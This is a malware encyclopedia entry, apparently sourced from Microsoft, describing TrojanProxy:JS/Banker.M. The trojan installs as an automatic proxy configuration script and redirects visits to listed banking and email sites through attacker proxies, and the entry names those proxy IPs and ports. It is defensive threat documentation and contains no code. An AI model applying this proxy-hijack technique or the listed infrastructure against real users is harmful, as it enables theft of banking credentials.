Home / malwarePDF  

TrojanProxy:JS/Banker.M


First posted on 02 April 2012.
Source: Microsoft

Aliases :

TrojanProxy:JS/Banker.M is also known as Trojan-Banker.JS.Proxy.ae (Kaspersky), JS/Banker.T (Avira), Win32/Spy.Banker.XLF trojan (ESET), Trojan-Banker.JS.Proxy (Ikarus), Trojan-Banker.JS.Proxy.ae (Kaspersky).

Explanation :

TrojanProxy:JS/Banker.M is a JavaScript trojan that intercepts communication between an infected computer and certain online banking websites, resulting in the possible theft of logon credentials or other sensitive information.


Top

TrojanProxy:JS/Banker.M is a JavaScript trojan that intercepts communication between an infected computer and certain online banking websites, resulting in the possible theft of logon credentials or other sensitive information.



Installation

TrojanProxy:JS/Banker.M may be installed by other malware as an automatic proxy configuration script.



Payload

Steals sensitive information

TrojanProxy:JS/Banker.M monitors user access of the following sites in its effort to steal logon credentials and other sensitive information:

  • 161.113.4.71
  • 170.66.11.10
  • 193.32.34.107
  • 199.67.180.39
  • 200.220.178.3
  • 201.20.136.5
  • 201.77.87.14
  • americanexpress.com.br
  • bancobradesco.com.br
  • bancoitau.com.br
  • bancosantander.com.br
  • bb.com.br
  • bradesco.com.br
  • caixa.com.br
  • caixaeconomica.com.br
  • cef.com.br
  • citibank.com
  • citibank.com.br
  • credicard.com.br
  • hotmail.com
  • hotmail.com.br
  • hsbc.com
  • hsbc.com.br
  • hsbcbank.com.br
  • hsbcpremier.com.br
  • itau.com.br
  • itaupersonnalite.com.br
  • latinamerica.citibank.com
  • login.live.com
  • pagseguro.uol.com.br
  • paypal.com
  • paypal.com.br
  • real.com.br
  • santander.com.br
  • santanderempresarial.com.br
  • santandernet.com.br
  • santandernetibe.com.br
  • serasa.com.br
  • serasaexperian.com.br
  • sicredi.com.br
  • tam.com.br


Please note that this list is not exhaustive.

If the affected user is observed visiting any of the above listed sites, the trojan redirects the traffic request through a specific proxy server, selected by the trojan author. This could result in the possible theft of logon credentials or other sensitive information.

Listed below are known IP address of trojan proxy servers:

  • 216.245.220.24 port 1023
  • 186.202.61.89 port 80




Analysis by Shali Hsieh

Last update 02 April 2012

 

TOP